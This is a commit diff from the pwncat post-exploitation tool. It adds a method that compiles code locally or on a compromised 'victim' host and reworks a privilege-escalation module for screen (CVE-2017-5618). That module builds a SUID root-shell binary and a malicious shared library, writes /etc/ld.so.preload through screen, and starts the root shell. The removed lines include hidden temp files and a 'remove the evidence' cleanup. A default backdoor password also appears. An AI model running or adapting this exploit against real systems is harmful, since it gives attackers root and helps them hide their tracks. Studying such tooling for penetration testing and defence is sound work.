mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-27 19:04:15 +01:00
Added generic pwncat.victim.compile method for compiling code to remote host
This commit is contained in:
parent
ae2c28670c
commit
668eadbaef
@ -25,14 +25,13 @@ def key_type(value: str) -> bytes:
|
||||
class KeyType:
|
||||
def __init__(self, name: str):
|
||||
if len(name) == 1:
|
||||
self.name = name
|
||||
self.value = name.encode("utf-8")
|
||||
else:
|
||||
if name not in ALL_KEYS:
|
||||
raise ValueError(f"{name}: invalid key")
|
||||
key = [key for key in Keys if key.value == name][0]
|
||||
self.name = name
|
||||
self.value = REVERSE_ANSI_SEQUENCES[key].encode("utf-8")
|
||||
self.name = name
|
||||
|
||||
def __repr__(self):
|
||||
return f"Key(name={repr(self.name)})"
|
||||
@ -63,6 +62,7 @@ class Config:
|
||||
"backdoor_pass": {"value": "pwncat", "type": str},
|
||||
"on_load": {"value": "", "type": str},
|
||||
"db": {"value": "sqlite:///:memory:", "type": str},
|
||||
"cross": {"value": None, "type": str},
|
||||
}
|
||||
|
||||
# Map ascii escape sequences or printable bytes to lists of commands to
|
||||
|
@ -2,17 +2,19 @@
|
||||
|
||||
import re
|
||||
import textwrap
|
||||
from io import StringIO
|
||||
from typing import List
|
||||
|
||||
import pwncat
|
||||
from pwncat.gtfobins import Capability
|
||||
from pwncat.privesc import Technique, BaseMethod, PrivescError
|
||||
from pwncat.util import CompilationError
|
||||
|
||||
|
||||
class Method(BaseMethod):
|
||||
|
||||
name = "screen (CVE-2017-5618)"
|
||||
BINARIES = ["cc", "screen"]
|
||||
BINARIES = ["screen"]
|
||||
|
||||
def __init__(self):
|
||||
self.ran_before = False
|
||||
@ -55,23 +57,27 @@ class Method(BaseMethod):
|
||||
|
||||
self.ran_before = True
|
||||
|
||||
# Hide the activity by creating hidden temporary files
|
||||
libhack_c = (
|
||||
pwncat.victim.run("mktemp -t .XXXXXXXXXXX --suffix .c")
|
||||
.decode("utf-8")
|
||||
.strip()
|
||||
)
|
||||
libhack_so = (
|
||||
pwncat.victim.run("mktemp -t .XXXXXXXXXXX --suffix .so")
|
||||
.decode("utf-8")
|
||||
.strip()
|
||||
)
|
||||
rootshell_c = (
|
||||
pwncat.victim.run("mktemp -t .XXXXXXXXXXX --suffix .c")
|
||||
.decode("utf-8")
|
||||
.strip()
|
||||
)
|
||||
rootshell = pwncat.victim.run("mktemp -t .XXXXXXXXXXX").decode("utf-8").strip()
|
||||
# Write the rootshell source code
|
||||
rootshell_source = textwrap.dedent(
|
||||
f"""
|
||||
#include <stdio.h>
|
||||
int main(void){{
|
||||
setuid(0);
|
||||
setgid(0);
|
||||
seteuid(0);
|
||||
setegid(0);
|
||||
execvp("{pwncat.victim.shell}", NULL, NULL);
|
||||
}}
|
||||
"""
|
||||
).lstrip()
|
||||
|
||||
# Compile the rootshell binary
|
||||
try:
|
||||
rootshell = pwncat.victim.compile([StringIO(rootshell_source)])
|
||||
except CompilationError as exc:
|
||||
raise PrivescError(f"compilation failed: {exc}")
|
||||
|
||||
rootshell_tamper = pwncat.victim.tamper.created_file(rootshell)
|
||||
|
||||
# Write the library
|
||||
libhack_source = textwrap.dedent(
|
||||
@ -88,45 +94,34 @@ class Method(BaseMethod):
|
||||
"""
|
||||
).lstrip()
|
||||
|
||||
with pwncat.victim.open(libhack_c, "w", length=len(libhack_source)) as filp:
|
||||
filp.write(libhack_source)
|
||||
|
||||
# Compile the library
|
||||
pwncat.victim.run(f"gcc -fPIC -shared -ldl -o {libhack_so} {libhack_c}")
|
||||
|
||||
# Write the rootshell source code
|
||||
rootshell_source = textwrap.dedent(
|
||||
f"""
|
||||
#include <stdio.h>
|
||||
int main(void){{
|
||||
setuid(0);
|
||||
setgid(0);
|
||||
seteuid(0);
|
||||
setegid(0);
|
||||
execvp("{pwncat.victim.shell}", NULL, NULL);
|
||||
}}
|
||||
"""
|
||||
).lstrip()
|
||||
|
||||
with pwncat.victim.open(rootshell_c, "w", length=len(rootshell_source)) as filp:
|
||||
filp.write(rootshell_source)
|
||||
|
||||
# Compile the rootshell binary
|
||||
pwncat.victim.run(f"gcc -o {rootshell} {rootshell_c}")
|
||||
# Compile libhack
|
||||
try:
|
||||
libhack_so = pwncat.victim.compile(
|
||||
[StringIO(libhack_source)],
|
||||
cflags=["-fPIC", "-shared"],
|
||||
ldflags=["-ldl"],
|
||||
)
|
||||
except CompilationError as exc:
|
||||
pwncat.victim.tamper.remove(rootshell_tamper)
|
||||
raise PrivescError("compilation failed: {exc}")
|
||||
|
||||
# Switch to /etc but save our previous directory so we can return to it
|
||||
pwncat.victim.run("pushd /etc")
|
||||
old_cwd = pwncat.victim.env(["pwd"]).strip().decode("utf-8")
|
||||
pwncat.victim.run("cd /etc")
|
||||
|
||||
# Run screen with our library, saving the umask before changing it
|
||||
start_umask = pwncat.victim.run("umask").decode("utf-8").strip()
|
||||
pwncat.victim.run("umask 000")
|
||||
# sleep(1)
|
||||
|
||||
# Run screen, loading our library and causing our rootshell to be SUID
|
||||
pwncat.victim.run(f'screen -D -m -L ld.so.preload echo -ne "{libhack_so}"')
|
||||
# sleep(1)
|
||||
|
||||
# Trigger the exploit
|
||||
pwncat.victim.run("screen -ls")
|
||||
|
||||
# We no longer need the shared object
|
||||
pwncat.victim.env(["rm", "-f", libhack_so])
|
||||
|
||||
# Reset umask to the saved value
|
||||
pwncat.victim.run(f"umask {start_umask}")
|
||||
|
||||
@ -135,14 +130,15 @@ class Method(BaseMethod):
|
||||
if file_owner != b"0":
|
||||
|
||||
# Hop back to the original directory
|
||||
pwncat.victim.run("popd")
|
||||
pwncat.victim.env(["cd", old_cwd])
|
||||
|
||||
# Ensure the files are removed
|
||||
pwncat.victim.env(["rm", "-f", libhack_so, rootshell])
|
||||
|
||||
raise PrivescError("failed to create root shell")
|
||||
|
||||
# Hop back to the original directory
|
||||
pwncat.victim.run("popd")
|
||||
pwncat.victim.env(["cd", old_cwd])
|
||||
|
||||
# Start the root shell!
|
||||
pwncat.victim.run(f"{rootshell}", wait=False)
|
||||
|
||||
# Remove the evidence
|
||||
pwncat.victim.run(f"unlink {libhack_so} {libhack_c} {rootshell_c} {rootshell}")
|
||||
pwncat.victim.run(rootshell, wait=False)
|
||||
|
@ -3,8 +3,11 @@ import hashlib
|
||||
import io
|
||||
import os
|
||||
import shlex
|
||||
import shutil
|
||||
import socket
|
||||
import subprocess
|
||||
import sys
|
||||
import tempfile
|
||||
from typing import Dict, Optional, Any, List, Tuple, Iterator, Union, Generator
|
||||
|
||||
import paramiko
|
||||
@ -727,6 +730,163 @@ class Victim:
|
||||
"""
|
||||
util.restore_terminal(self.saved_term_state)
|
||||
|
||||
def compile(
|
||||
self,
|
||||
sources: List[Union[str, io.IOBase]],
|
||||
output: str = None,
|
||||
suffix: str = None,
|
||||
cflags: List[str] = None,
|
||||
ldflags: List[str] = None,
|
||||
):
|
||||
"""
|
||||
If possible, compile the given source files on the local host using the cross compiler given
|
||||
by the `cross` configuration value. If `cross` is not set or cannot compile the given sources,
|
||||
then check if a valid compiler is available on the remote host. If a local cross compiler is
|
||||
selected, the output file is then uploaded to the remote host.
|
||||
|
||||
In either case, the full path to the output file on the remote host is returned.
|
||||
|
||||
May raise FileNotFound error if the given source doesn't exist. May also raise util.CompilationError
|
||||
with the stdout/stderr of the compiler if compilation failed either locally or on the remote host.
|
||||
|
||||
:param sources: a list of source files or IO streams used as source files
|
||||
:param output: the base name of the output file, if this is None, the name is randomly selected
|
||||
with an optional suffix.
|
||||
:param suffix: a suffix to add to the basename. This isn't useful except for when output is
|
||||
None, but will be honored in either case.
|
||||
:param cflags: a list of arguments to pass to GCC prior to the sources
|
||||
:param ldflags: a list of arguments to pass to GCC after the sources
|
||||
:return: a string indicating the path to the remote binary after compilation.
|
||||
"""
|
||||
|
||||
if cflags is None:
|
||||
cflags = []
|
||||
if ldflags is None:
|
||||
ldflags = []
|
||||
|
||||
try:
|
||||
cross = self.config["cross"]
|
||||
except KeyError:
|
||||
cross = None
|
||||
|
||||
if cross is not None and os.path.isfile(cross):
|
||||
# Attempt compilation locally
|
||||
util.progress("attempting local compilation")
|
||||
|
||||
real_sources = []
|
||||
local_temps = []
|
||||
|
||||
# First, ensure all files are on disk, and keep track of local temp files we
|
||||
# need to remove later.
|
||||
for source in sources:
|
||||
if isinstance(source, str):
|
||||
if not os.path.isfile(source):
|
||||
raise FileNotFoundError(f"{source}: No such file or directory")
|
||||
real_sources.append(source)
|
||||
else:
|
||||
with tempfile.NamedTemporaryFile(
|
||||
mode="w", suffix=".c", delete=False
|
||||
) as filp:
|
||||
filp.write(source.read())
|
||||
real_sources.append(filp.name)
|
||||
local_temps.append(filp.name)
|
||||
|
||||
# Next, ensure we have a valid temporary file location locally for the output file with
|
||||
# the correct suffix. We will upload with the requested name in a moment
|
||||
with tempfile.NamedTemporaryFile("w", suffix=suffix, delete=False) as filp:
|
||||
filp.write("\n")
|
||||
local_output = filp.name
|
||||
|
||||
# Build the GCC command needed to compile
|
||||
command = [
|
||||
cross,
|
||||
f"-march={self.host.arch.replace('_', '-')}",
|
||||
"-o",
|
||||
local_output,
|
||||
*cflags,
|
||||
*real_sources,
|
||||
*ldflags,
|
||||
]
|
||||
|
||||
# Run GCC and grab the output
|
||||
try:
|
||||
util.progress(f"attempting local compilation: compiling sources")
|
||||
subprocess.run(command, check=True, capture_output=True)
|
||||
except subprocess.CalledProcessError as exc:
|
||||
raise util.CompilationError(True, exc.stdout, exc.stderr)
|
||||
|
||||
# We have a compiled executable. We now need to upload it.
|
||||
length = os.path.getsize(local_output)
|
||||
with open(local_output, "rb") as source:
|
||||
util.progress(f"attempting local compilation: uploaded compiled binary")
|
||||
# Decide on a name
|
||||
if output is not None and output.startswith("/"):
|
||||
# Absolute path
|
||||
dest = pwncat.victim.open(output, "wb", length=length)
|
||||
else:
|
||||
# We don't care where it goes, make a tempfile
|
||||
dest = self.tempfile("wb", length=length, suffix=suffix)
|
||||
|
||||
remote_path = dest.name
|
||||
|
||||
with dest:
|
||||
shutil.copyfileobj(source, dest, length=length)
|
||||
|
||||
util.progress(f"attempting local compilation: marking binary executable")
|
||||
self.env(["chmod", "+x", remote_path])
|
||||
|
||||
util.erase_progress()
|
||||
|
||||
return remote_path
|
||||
|
||||
# Do we even have a remote compiler?
|
||||
gcc = self.which("gcc")
|
||||
if gcc is None:
|
||||
raise util.CompilationError(False, None, None)
|
||||
|
||||
util.progress("attempting remote compilation")
|
||||
|
||||
# We have a remote compiler. We need to get the sources to the remote host
|
||||
real_sources = []
|
||||
for source in sources:
|
||||
# Upload or write data
|
||||
if isinstance(source, str):
|
||||
util.progress(f"attempting remote compilation: uploading {source}")
|
||||
with open(source, "rb") as src:
|
||||
with self.tempfile(
|
||||
"wb", length=os.path.getsize(source), suffix=".c"
|
||||
) as dest:
|
||||
shutil.copyfileobj(src, dest)
|
||||
real_sources.append(dest.name)
|
||||
else:
|
||||
util.progress(f"attempting remote compilation: uploading source data")
|
||||
with self.tempfile("w", suffix=".c") as dest:
|
||||
shutil.copyfileobj(source, dest)
|
||||
real_sources.append(dest.name)
|
||||
|
||||
# We just need to create a file...
|
||||
with self.tempfile("w", length=1) as filp:
|
||||
filp.write("\n")
|
||||
remote_path = filp.name
|
||||
|
||||
# Build the command
|
||||
command = [gcc, "-o", remote_path, *cflags, *real_sources, *ldflags]
|
||||
command = shlex.join(command) + f" 2>&1 || echo '__pwncat_gcc_failed__'"
|
||||
|
||||
util.progress("attempting remote compilation: compiling...")
|
||||
with self.subprocess(command, "r") as pipe:
|
||||
stdout = pipe.read().decode("utf-8")
|
||||
|
||||
util.progress("attempting remote compilation: removing temp files")
|
||||
self.env(["rm", "-f", *real_sources])
|
||||
|
||||
if "__pwncat_gcc_failed__" in stdout:
|
||||
raise util.CompilationError(True, stdout, stdout)
|
||||
|
||||
util.erase_progress()
|
||||
|
||||
return remote_path
|
||||
|
||||
def env(
|
||||
self,
|
||||
argv: List[str],
|
||||
|
@ -130,15 +130,17 @@ class TamperManager:
|
||||
added_lines: Optional[List[str]] = None,
|
||||
):
|
||||
""" Add a new modified file tamper """
|
||||
self.add(
|
||||
ModifiedFile(
|
||||
path, added_lines=added_lines, original_content=original_content
|
||||
)
|
||||
tamper = ModifiedFile(
|
||||
path, added_lines=added_lines, original_content=original_content
|
||||
)
|
||||
self.add(tamper)
|
||||
return tamper
|
||||
|
||||
def created_file(self, path: str):
|
||||
""" Register a new added file on the remote system """
|
||||
self.add(CreatedFile(path))
|
||||
tamper = CreatedFile(path)
|
||||
self.add(tamper)
|
||||
return tamper
|
||||
|
||||
def add(self, tamper: Tamper):
|
||||
""" Register a custom tamper tracker """
|
||||
@ -148,7 +150,9 @@ class TamperManager:
|
||||
pwncat.victim.session.commit()
|
||||
|
||||
def custom(self, name: str, revert: Optional[Callable] = None):
|
||||
self.add(LambdaTamper(name, revert))
|
||||
tamper = LambdaTamper(name, revert)
|
||||
self.add(tamper)
|
||||
return tamper
|
||||
|
||||
def __iter__(self) -> Iterator[Tamper]:
|
||||
for tracker in pwncat.victim.host.tampers:
|
||||
|
@ -1,6 +1,6 @@
|
||||
#!/usr/bin/env python3
|
||||
import re
|
||||
from typing import Tuple, BinaryIO, Callable, List
|
||||
from typing import Tuple, BinaryIO, Callable, List, Optional
|
||||
from http.server import BaseHTTPRequestHandler, HTTPServer
|
||||
from socketserver import TCPServer, BaseRequestHandler
|
||||
from prompt_toolkit.shortcuts import ProgressBar
|
||||
@ -62,6 +62,32 @@ class Init(Enum):
|
||||
SYSV = auto()
|
||||
|
||||
|
||||
class CompilationError(Exception):
|
||||
"""
|
||||
Indicates that compilation failed on either the local or remote host.
|
||||
|
||||
:param source_error: indicates whether there was a compilation error due to source
|
||||
code syntax. If not, this was due to a missing compiler.
|
||||
"""
|
||||
|
||||
def __init__(
|
||||
self, source_error: bool, stdout: Optional[str], stderr: Optional[str]
|
||||
):
|
||||
self.source_error = source_error
|
||||
self.stdout = stdout
|
||||
self.stderr = stderr
|
||||
|
||||
def __str__(self):
|
||||
"""
|
||||
Provide a easy output depending on the reason for the failure.
|
||||
:return: str
|
||||
"""
|
||||
if self.source_error:
|
||||
return f"No working local or remote compiler found"
|
||||
else:
|
||||
return f"Error during compilation of source files"
|
||||
|
||||
|
||||
def isprintable(data) -> bool:
|
||||
"""
|
||||
This is a convenience function to be used rather than the usual
|
||||
|
Loading…
Reference in New Issue
Block a user